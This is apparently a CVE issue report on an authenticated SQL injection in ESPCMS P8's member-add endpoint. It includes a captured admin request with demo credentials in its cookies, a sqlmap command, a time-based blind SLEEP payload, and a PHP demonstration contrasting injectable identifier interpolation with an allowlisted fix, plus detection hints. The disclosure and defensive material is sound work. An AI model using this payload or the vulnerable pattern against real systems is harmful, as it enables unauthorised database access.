CVE-2023-23007: There is a sql injection vulnerability in ESPCMS P8.21120101 · Issue #I680WG · 轻舞飞沙/易思ESPCMS-P8企业建站管理系统 - Gitee.com
An issue was discovered in ESPCMS P8.21120101. After logging in to the background, there is a SQL injection vulnerability at the function point where members are added.
**Issue**
After logging in to the background, there is a SQL injection vulnerability at the Add Member function point.
**Steps to reproduce**
- Log in to the management background
- Click Member>Add Member
Problematic request:

```http
GET /espcms_admin/index.php?act=X9DCVqHOg51sW5WnJNik2%2BEh6%2BhfdozuajbeQYirJJk%3D&verify_value=xxx&verify_key=username&verifyType=0 HTTP/1.1
Host: 127.0.0.1:8010
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8010/espcms_admin/index.php?act=RCJVc7i2vPJsW5WnJNik2yqO9KotWWATQJ%2BJr83OPQ4%3D&par_iframes_name=espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36&iframes_name=espcms_tab_iframe_731749b97e8fc862e9de34d80c1fa7c8&freshid=0.07419096625411115
Cookie: espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_now_page=0; espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_per_page_num=20; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_now_page=1; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_per_page_num=20; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_now_page=0; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_per_page_num=20; espcms_admin_user_info=vHzemLN06s%2BCBCZmysn5BEspscayx5moFZbFc%2BYiMsiK0A8JxQV1DgryT8ALHbP%2FpWpbeeMDWVhDSQf9nN0bg2oehJsC38ek42J4vhZ%2BEpBhUHpwgyAokKcDe9vfVTK81r9Qa0Zk0J46c5yrfur061b%2B5m%2F63da2Tp1gB7Bzm1wUVS5K648%2B8RXzpevd9RO03oyPJPqCojA0scG7KhdhwuutSQMB1m71Ng4%2BPvDfjsR%2FlRBzorN2mVwfNgUpPvbLOU0HNAi9NgJAwOPqLRQaP6G3EItDbWNtTVcfATuOhD2wspV3ear%2Bx7iP0kfiTurVPrUe%2FJPzcqhl3ubkaeNRuRhCKQsDDu8Iac%2FKrilQamMDIkjdXmZhHNY6an3KLn7247Nlm9K4zgTeEOesUWP2YGKnN0mtOfNbgBQNJRcx5rFfSW0VlP%2BVIzSxwbsqF2HCMSQ44W0oifYTfA69ictDGQ0uLADH%2BpdZ; espcms_admin_user_server_info=N8LTSEOntanP%2Bv9d2FaEWTLHmuuYWpMc8zj6G50bHR%2Fr%2BZotmzdaJM%2F6%2F13YVoRZNBBGeYuLw0rz73sgkXaYDqOpkSEbSBU5; PHPSESSID=nh6n2915gtuedqm93nql1nuv1k; espcms_setup_db=a%3A14%3A%7Bs%3A7%3A%22db_host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A7%3A%22db_name%22%3Bs%3A15%3A%22espcms_p8_demo1%22%3Bs%3A7%3A%22db_user%22%3Bs%3A4%3A%22root%22%3Bs%3A11%3A%22db_password%22%3Bs%3A4%3A%22root%22%3Bs%3A9%3A%22db_prefix%22%3Bs%3A7%3A%22espcms_%22%3Bs%3A12%3A%22db_setuptype%22%3Bs%3A1%3A%220%22%3Bs%3A11%3A%22db_linktype%22%3Bs%3A1%3A%220%22%3Bs%3A13%3A%22module_dbdemo%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22module_app%22%3Bs%3A1%3A%220%22%3Bs%3A14%3A%22admin_username%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22admin_email%22%3Bs%3A15%3A%22admin%40admin.com%22%3Bs%3A14%3A%22admin_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A19%3A%22validation_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A7%3A%22webname%22%3Bs%3A6%3A%22espcms%22%3B%7D; espcms_admin_login_verification_code=93CeyfmSi1jO%2BQUah35IwA%3D%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
```
Using sqlmap: `sqlmap.py -r ss.txt -p verify_key --current-db`

```
---
Parameter: verify_key (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: act=or73S4mLbK+u7ZRDsPSnahehmi0uNdR25zCzZisJjaI=&verify_value=xxxx&verify_key=username AND (SELECT 3018 FROM (SELECT(SLEEP(5)))QCXL)&verifyType=0
---
```
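The report shows the injection landing in `verify_key`, which names a column (`username`) rather than supplying a value. That is the usual root cause for this bug class: a column identifier cannot be bound as a prepared-statement parameter, so if it is taken straight from the request and interpolated into the SQL text, the attacker controls query structure. The following is an added example, not ESPCMS source code; it assumes a hypothetical member-add check that asks "does a member with this `verify_key` = `verify_value` already exist", uses a constructed `member` table on an in-memory SQLite database via PDO, and shows the interpolating pattern beside a hardened version that allowlists the identifier and binds the value.

```php
<?php
// Added illustrative example (not ESPCMS code). Assumptions: the endpoint receives
// verify_key (a column name) and verify_value, and answers whether a member row with
// that value exists. Table name, columns and rows below are constructed for the demo.
declare(strict_types=1);

// Vulnerable pattern, shown for contrast: the identifier from the request is spliced
// into the SQL text. Quoting the value does not help, because the injected text sits
// in the identifier position, outside any string literal.
function member_exists_vulnerable(PDO $db, string $verify_key, string $verify_value): bool
{
    $sql = "SELECT COUNT(*) FROM member WHERE {$verify_key} = " . $db->quote($verify_value);
    return (int) $db->query($sql)->fetchColumn() > 0;
}

// Hardened form: identifiers are restricted to a fixed allowlist (exact, case-sensitive
// match), and the value travels as a bound parameter. On MySQL the identifier would be
// wrapped in backticks instead of double quotes; the allowlist is what matters.
const VERIFY_COLUMNS = ['username', 'email', 'phone'];

function member_exists_safe(PDO $db, string $verify_key, string $verify_value): bool
{
    if (!in_array($verify_key, VERIFY_COLUMNS, true)) {
        throw new InvalidArgumentException('verify_key is not a permitted column');
    }
    $stmt = $db->prepare("SELECT COUNT(*) FROM member WHERE \"{$verify_key}\" = :value");
    $stmt->execute([':value' => $verify_value]);
    return (int) $stmt->fetchColumn() > 0;
}

// Self-contained demo on an in-memory SQLite database (requires the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE member (id INTEGER PRIMARY KEY, username TEXT, email TEXT, phone TEXT)');
$db->exec("INSERT INTO member (username, email, phone) VALUES ('alice', 'alice@example.test', '100')");

// Normal use: an existing and a non-existing member, both through the hardened check.
var_dump(member_exists_safe($db, 'username', 'alice'));
var_dump(member_exists_safe($db, 'username', 'nobody'));

// Constructed hostile identifier: a tautology appended to the column name. The vulnerable
// version reports that 'nobody' exists because the WHERE clause now matches every row;
// the hardened version refuses the identifier before any SQL is built.
$injected = 'username = username OR 1=1 OR username';
var_dump(member_exists_vulnerable($db, $injected, 'nobody'));
try {
    member_exists_safe($db, $injected, 'nobody');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The same allowlist idea applies to any request-controlled identifier (column, table, ORDER BY direction): map the user-supplied token to a known constant and build the query from the constant, never from the token. For detection, the reproduced payload leaves a recognisable trace in access logs: `verify_key` values containing whitespace, `SLEEP(` or `SELECT` on an authenticated admin path are worth alerting on, since a legitimate `verify_key` is a bare column name.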